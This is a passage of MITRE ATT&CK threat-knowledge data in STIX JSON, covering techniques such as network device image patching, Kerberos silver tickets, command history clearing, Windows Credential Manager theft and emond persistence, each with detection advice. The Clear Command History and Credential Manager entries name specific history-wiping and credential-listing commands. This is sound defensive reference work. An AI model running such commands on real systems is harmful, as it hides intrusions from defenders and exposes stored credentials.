"https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/"}, {"source_name": "CISA Karakurt 2022", "description": "Cybersecurity Infrastructure and Defense Agency. (2022, June 2). Karakurt Data Extortion Group. Retrieved March 10, 2023.", "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a"}, {"source_name": "Microsoft Ransomware as a Service", "description": "Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Patch System Image", "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary\u2019s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", "created": "2020-10-19T19:49:24.129Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1601/001", "external_id": "T1601.001"}, {"source_name": "Killing the myth of Cisco IOS rootkits", "description": "Sebastian 'topo' Mu\u00f1iz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.", "url": "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf"}, {"source_name": "Killing IOS diversity myth", "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.", "url": "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf"}, {"source_name": "Cisco IOS Shellcode", "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.", "url": "http://2015.zeronights.org/assets/files/05-Nosenko.pdf"}, {"source_name": "Cisco IOS Forensics Developments", "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.", "url": "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf"}, {"source_name": "Juniper Netscreen of the Dead", "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.", "url": "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf"}, {"source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7"}, {"source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Silver Ticket", "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", "created": "2020-02-11T19:14:48.309Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1558/002", "external_id": "T1558.002"}, {"source_name": "ADSecurity Silver Tickets", "description": "Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.", "url": "https://adsecurity.org/?p=2011"}, {"source_name": "ADSecurity Detecting Forged Tickets", "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", "url": "https://adsecurity.org/?p=1515"}, {"source_name": "Medium Detecting Attempts to Steal Passwords from Memory", "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-01T16:27:47.391Z", "name": "Data from Information Repositories", "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)", "Regina Elwell", "Praetorian", "Milos Stojadinovic", "Isif Ibrahima, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS", "SaaS", "Office 365", "Google Workspace", "IaaS"], "x_mitre_version": "3.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1213", "external_id": "T1213"}, {"source_name": "Atlassian Confluence Logging", "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.", "url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html"}, {"source_name": "Microsoft SharePoint Logging", "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2"}, {"source_name": "Sharepoint Sharing Events", "description": "Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.", "url": "https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Clear Persistence", "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary\u2019s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Gavin Knapp"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "created": "2022-07-29T19:32:11.552Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/009", "external_id": "T1070.009"}, {"source_name": "Cylance Dust Storm", "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"}, {"source_name": "Talos - Cisco Attack 2022", "description": "Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.", "url": "https://blog.talosintelligence.com/recent-cyber-attack/"}, {"source_name": "NCC Group Team9 June 2020", "description": "Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.", "url": "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Clear Command History", "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as unset HISTFILE, export HISTFILESIZE=0, history -c, rm ~/.bash_history.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the ~/.bash_history file are indicators of suspicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Log analysis", "Host forensic analysis"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d3046a90-580c-4004-8208-66915bc29830", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1146", "external_id": "T1146"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Windows Credential Manager", "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the \u201cBack up...\u201d button on the \u201cStored User Names and Passwords\u201d GUI.\n\nPassword recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Bernaldo Penas Antelo", "Mugdha Peter Bansode", "Uriel Kosayev", "Vadim Khrykov"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:\u201cWindows Credentials\u201d).(Citation: Malwarebytes The Windows Vault)\n\nConsider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nConsider monitoring file reads to Vault locations, %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\, for suspicious activity.(Citation: Malwarebytes The Windows Vault)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", "created": "2020-11-23T15:35:53.793Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1555/004", "external_id": "T1555.004"}, {"source_name": "Malwarebytes The Windows Vault", "description": "Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.", "url": "https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/"}, {"source_name": "Delpy Mimikatz Crendential Manager", "description": "Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.", "url": "https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials"}, {"source_name": "Microsoft Credential Locker", "description": "Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN"}, {"source_name": "Microsoft Credential Manager store", "description": "Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store"}, {"source_name": "Microsoft CredEnumerate", "description": "Microsoft. (2018, December 5). CredEnumarateA function (wincred.h). Retrieved November 24, 2020.", "url": "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea"}, {"source_name": "passcape Windows Vault", "description": "Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.", "url": "https://www.passcape.com/windows_password_recovery_vault_explorer"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Emond", "description": "Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1160) service.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ivan Sinyakov"], "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d376668f-b208-42de-b1f5-fdfe0ad4b753", "created": "2019-09-19T14:07:11.734Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1519", "external_id": "T1519"}, {"source_name": "xorrior emond Jan 2018", "description": "Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.", "url": "https://www.xorrior.com/emond-persistence/"}, {"source_name": "magnusviri emond Apr 2016", "description": "Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.", "url": "http://www.magnusviri.com/Mac/what-is-emond.html"}, {"source_name": "sentinelone macos persist Jun 2019", "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Spearphishing via Service", "description": "Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1194", "external_id": "T1194"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/163.html", "external_id": "CAPEC-163"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Hardware Additions", "description": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1200", "external_id": "T1200"}, {"source_name": "Ossmann Star Feb 2011", "description": "Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.", "url": "https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html"}, {"source_name": "Aleks Weapons Nov 2015", "description": "Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018.", "url": "https://www.youtube.com/watch?v=lDvf4ScWbcQ"}, {"source_name": "McMillan Pwn March 2012", "description": "Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.", "url": "https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/"}, 